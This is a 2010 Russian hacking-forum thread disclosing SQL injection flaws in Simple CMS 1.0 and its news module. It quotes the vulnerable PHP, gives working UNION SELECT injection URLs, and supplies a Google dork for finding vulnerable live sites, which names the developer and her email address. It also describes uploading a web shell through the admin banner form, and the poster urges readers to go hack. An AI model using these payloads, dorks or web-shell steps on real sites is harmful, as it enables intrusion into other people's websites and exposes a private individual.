Старый 21.10.2010, 19:57   #1
-PRIVAT-
 
Регистрация: 06.07.2010
Сообщений: 10
Репутация: 5
По умолчанию Уязвимости Simple CMS

О Simple CMS

От себя хочу сказать, что Simple CMS. ver.1.0. вся дырявая. Почти на каждом месте есть SQL inj.
По дорку гугла мне выдало "Результатов: примерно 14 800 (0,35 сек.) ".
SQL инъекции:

SQL inj в выборе статьи, уязвимый код:
PHP код:
if (isset($_GET['artcl']))
{
    
$id_art $_GET['artcl'];
    
$article mysql_query("SELECT title, article FROM artcl WHERE IDart=".$id_art); 
Как видно, нет никакой фильтрации..
Пример: localhost/index.php?id=3&artcl=-4 union select version(),2--

SQL inj в выборе раздела, уязвимый код:
PHP код:
    if (isset($_GET['id']))
    {
        
$id $_GET['id'];
    }
    else
    {
        
$id 1;
    }
    print 
"<table width='100%' cellpadding=2 cellspacing=2>";
    
$razdel mysql_query("SELECT menu, txt FROM tree WHERE id=".$id); 
Пример: localhost/index.php?id=-3 union select 1,version()--

Незачем дальше перечислять, она вся в дырках.
К сожалению, хочу отметить, что пароли администраторов не хранятся в БД. Они находятся в файле connect.php.
Панель админа находится по адресу /admin/, если вы попали в админку, то заходим Баннеры > льём через форму загрузки баннеров шелл > шелл будет доступен по адресу images/shell.php
Вот вам пример, хекайте!
P.S Дорк "intext:Разработано Яшиной С. svetulik2004@mail.ru". Если боян извиняйте, значит не нашёл в гугле или же плохо искал
З.Ы Писала движок девушка . Официальный сайт
-PRIVAT- вне форума   Ответить с цитированием
Старый 21.10.2010, 20:11   #2
-PRIVAT-
 
Регистрация: 06.07.2010
Сообщений: 10
Репутация: 5
По умолчанию

..UPD..

Только что зашёл на официальный сайт в раздел Мои разработки, скачал модуль новостей и снова он бажный .
PHP код:
if (isset($_GET['id_news']))
        {
            
$id_news $_GET['id_news'];
            
$news mysql_query("SELECT rus_name, rus_annonce, rus_content, date FROM news WHERE id=".$id_news); 
Пример: localhost/news/news.php?id_news=-2 union select version(),2,3,4--

Пойду дальше смотреть "Мои разработки"...
-PRIVAT- вне форума   Ответить с цитированием
Старый 22.10.2010, 08:16   #3
lukmus
 
Аватар для lukmus
 
Регистрация: 11.08.2010
Сообщений: 132
Репутация: 20
По умолчанию

это классно конечно, но ты пытался пройти хоть по одной ссылке по дорку, там все сайты в ауте т.к. они скорее всего являлись дорами www.ostrov-okon.ru и еще про трубы одного. Эти же 2 сайта урезаны до минимума, на первый и второй мой взгляд я не нашел ни одного скрипта который бы принимал параметры
__________________
Контактный XMPP: lukmus[собака]wallstreetjabber.biz
lukmus вне форума   Ответить с цитированием
Старый 22.10.2010, 09:22   #4
-PRIVAT-
 
Регистрация: 06.07.2010
Сообщений: 10
Репутация: 5
По умолчанию

Цитата:
Сообщение от lukmus Посмотреть сообщение
это классно конечно, но ты пытался пройти хоть по одной ссылке по дорку, там все сайты в ауте т.к. они скорее всего являлись дорами www.ostrov-okon.ru и еще про трубы одного. Эти же 2 сайта урезаны до минимума, на первый и второй мой взгляд я не нашел ни одного скрипта который бы принимал параметры
На момент нахождения уязвимости все сайты были работоспособны. Возможно кто-то их поковырял.
__________________
За Родину! За Сталина! За мир! За коммунизм!
-PRIVAT- вне форума   Ответить с цитированием
Ответ

Метки
баги, уязвимости, simple cms

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot